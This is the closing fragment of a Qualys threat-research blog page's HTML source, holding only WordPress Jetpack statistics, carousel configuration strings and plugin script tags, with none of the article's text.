id="jetpack-stats-js-after"> _stq = window._stq || []; _stq.push([ "view", JSON.parse("{\"v\":\"ext\",\"blog\":\"105655880\",\"post\":\"29363\",\"tz\":\"-8\",\"srv\":\"blog.qualys.com\",\"j\":\"1:13.9.1\"}") ]); _stq.push([ "clickTrackerInit", "105655880", "29363" ]); </script> <script id="jetpack-carousel-js-extra"> var jetpackSwiperLibraryPath = {"url":"https:\/\/blog.qualys.com\/wp-content\/plugins\/jetpack\/_inc\/build\/carousel\/swiper-bundle.min.js"}; var jetpackCarouselStrings = 
{"widths":[370,700,1000,1200,1400,2000],"is_logged_in":"","lang":"en","ajaxurl":"https:\/\/blog.qualys.com\/wp-admin\/admin-ajax.php","nonce":"1d8f01989f","display_exif":"0","display_comments":"1","single_image_gallery":"1","single_image_gallery_media_file":"","background_color":"black","comment":"Comment","post_comment":"Post Comment","write_comment":"Write a Comment...","loading_comments":"Loading Comments...","download_original":"View full size <span class=\"photo-size\">{0}<span class=\"photo-size-times\">\u00d7<\/span>{1}<\/span>","no_comment_text":"Please be sure to submit some text with your comment.","no_comment_email":"Please provide an email address to comment.","no_comment_author":"Please provide your name to comment.","comment_post_error":"Sorry, but there was an error posting your comment. Please try again later.","comment_approved":"Your comment was approved.","comment_unapproved":"Your comment is in moderation.","camera":"Camera","aperture":"Aperture","shutter_speed":"Shutter Speed","focal_length":"Focal Length","copyright":"Copyright","comment_registration":"0","require_name_email":"1","login_url":"https:\/\/blog.qualys.com\/wp-login.php?redirect_to=https%3A%2F%2Fblog.qualys.com%2Fvulnerabilities-threat-research%2F2022%2F02%2F08%2Flolzarus-lazarus-group-incorporating-lolbins-into-campaigns","blog_id":"1","meta_data":["camera","aperture","shutter_speed","focal_length","copyright"]}; </script> <script src="https://ik.imagekit.io/qualys/wp-content/plugins/jetpack/_inc/build/carousel/jetpack-carousel.min.js?ver=13.9.1" id="jetpack-carousel-js"></script> <script defer src="https://ik.imagekit.io/qualys/wp-content/plugins/akismet/_inc/akismet-frontend.js?ver=1720667369" id="akismet-frontend-js"></script> </body> </html>